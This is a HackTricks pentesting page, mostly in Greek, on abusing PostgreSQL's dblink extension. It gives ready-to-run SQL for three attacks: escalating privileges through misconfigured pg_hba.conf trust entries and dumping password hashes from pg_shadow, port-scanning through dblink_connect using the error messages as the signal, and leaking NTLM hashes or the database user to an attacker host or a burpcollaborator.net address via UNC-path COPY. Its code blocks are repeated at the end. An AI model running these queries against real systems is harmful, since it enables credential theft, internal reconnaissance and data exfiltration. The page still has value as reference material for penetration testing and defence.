Network - Privesc, Port Scanner and NTLM chanllenge response disclosure

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Βρείτε περισσότερες πληροφορίες σχετικά με αυτές τις επιθέσεις στο πρωτότυπο έγγραφο.

Από την PostgreSQL 9.1, η εγκατάσταση επιπλέον modules είναι απλή. Καταχωρημένες επεκτάσεις όπως το dblink μπορούν να εγκατασταθούν με CREATE EXTENSION:

CREATE EXTENSION dblink;

Μόλις φορτώσετε το dblink, θα μπορούσατε να εκτελέσετε μερικά ενδιαφέροντα κόλπα:

Privilege Escalation

Το αρχείο pg_hba.conf θα μπορούσε να είναι κακώς διαμορφωμένο επιτρέποντας συνδέσεις από localhost ως οποιοσδήποτε χρήστης χωρίς να χρειάζεται να γνωρίζετε τον κωδικό πρόσβασης. Αυτό το αρχείο μπορεί συνήθως να βρεθεί στο /etc/postgresql/12/main/pg_hba.conf και μια κακή διαμόρφωση φαίνεται έτσι:

local    all    all    trust

Σημειώστε ότι αυτή η ρύθμιση χρησιμοποιείται συνήθως για να τροποποιήσει τον κωδικό πρόσβασης ενός χρήστη db όταν ο διαχειριστής τον ξεχνά, οπότε μερικές φορές μπορεί να το βρείτε. Σημειώστε επίσης ότι το αρχείο pg_hba.conf είναι αναγνώσιμο μόνο από τον χρήστη και την ομάδα postgres και εγγράψιμο μόνο από τον χρήστη postgres.

Αυτή η περίπτωση είναι χρήσιμη αν έχετε ήδη ένα shell μέσα στο θύμα, καθώς θα σας επιτρέψει να συνδεθείτε στη βάση δεδομένων postgresql.

Μια άλλη πιθανή κακή ρύθμιση περιλαμβάνει κάτι σαν αυτό:

host    all     all     127.0.0.1/32    trust

Καθώς θα επιτρέπει σε όλους από το localhost να συνδεθούν στη βάση δεδομένων ως οποιοσδήποτε χρήστης. Σε αυτή την περίπτωση και αν η dblink λειτουργία είναι λειτουργική, θα μπορούσατε να ανεβάσετε δικαιώματα συνδεόμενοι στη βάση δεδομένων μέσω μιας ήδη καθορισμένης σύνδεσης και να αποκτήσετε πρόσβαση σε δεδομένα που δεν θα έπρεπε να έχετε πρόσβαση:

SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'SELECT datname FROM pg_database')
RETURNS (result TEXT);

SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'select usename, passwd from pg_shadow')
RETURNS (result1 TEXT, result2 TEXT);

Port Scanning

Καταχρώντας το dblink_connect θα μπορούσατε επίσης να αναζητήσετε ανοιχτές θύρες. Αν αυτή η **λειτουργία δεν λειτουργεί, θα πρέπει να προσπαθήσετε να χρησιμοποιήσετε το dblink_connect_u() καθώς η τεκμηρίωση αναφέρει ότι το dblink_connect_u() είναι ταυτόσημο με το dblink_connect(), εκτός από το ότι θα επιτρέπει στους μη υπερχρήστες να συνδέονται χρησιμοποιώντας οποιαδήποτε μέθοδο πιστοποίησης_.

SELECT * FROM dblink_connect('host=216.58.212.238
port=443
user=name
password=secret
dbname=abc
connect_timeout=10');
//Different response
// Port closed
RROR:  could not establish connection
DETAIL:  could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 4444?

// Port Filtered/Timeout
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTP server
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTPS server
ERROR:  could not establish connection
DETAIL:  received invalid response to SSL negotiation:

Σημειώστε ότι πριν μπορέσετε να χρησιμοποιήσετε το dblink_connect ή το dblink_connect_u ίσως χρειαστεί να εκτελέσετε:

CREATE extension dblink;

UNC path - NTLM hash disclosure

-- can be used to leak hashes to Responder/equivalent
CREATE TABLE test();
COPY test FROM E'\\\\attacker-machine\\footestbar.txt';

-- to extract the value of user and send it to Burp Collaborator
CREATE TABLE test(retval text);
CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$
DECLARE sqlstring TEXT;
DECLARE userval TEXT;
BEGIN
SELECT INTO userval (SELECT user);
sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\'';
EXECUTE sqlstring;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT testfunc();

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousPL/pgSQL Password Bruteforce NextBig Binary Files Upload (PostgreSQL)

Last updated 3 months ago

SELECT * FROM dblink('host=127.0.0.1 user=postgres dbname=postgres', 'SELECT datname FROM pg_database') RETURNS (result TEXT); SELECT * FROM dblink('host=127.0.0.1 user=postgres dbname=postgres', 'select usename, passwd from pg_shadow') RETURNS (result1 TEXT, result2 TEXT);

SELECT * FROM dblink_connect('host=216.58.212.238 port=443 user=name password=secret dbname=abc connect_timeout=10'); //Different response // Port closed RROR: could not establish connection DETAIL: could not connect to server: Connection refused Is the server running on host "127.0.0.1" and accepting TCP/IP connections on port 4444? // Port Filtered/Timeout ERROR: could not establish connection DETAIL: timeout expired // Accessing HTTP server ERROR: could not establish connection DETAIL: timeout expired // Accessing HTTPS server ERROR: could not establish connection DETAIL: received invalid response to SSL negotiation:

-- to extract the value of user and send it to Burp Collaborator CREATE TABLE test(retval text); CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$ DECLARE sqlstring TEXT; DECLARE userval TEXT; BEGIN SELECT INTO userval (SELECT user); sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\''; EXECUTE sqlstring; END; $$ LANGUAGE plpgsql SECURITY DEFINER; SELECT testfunc();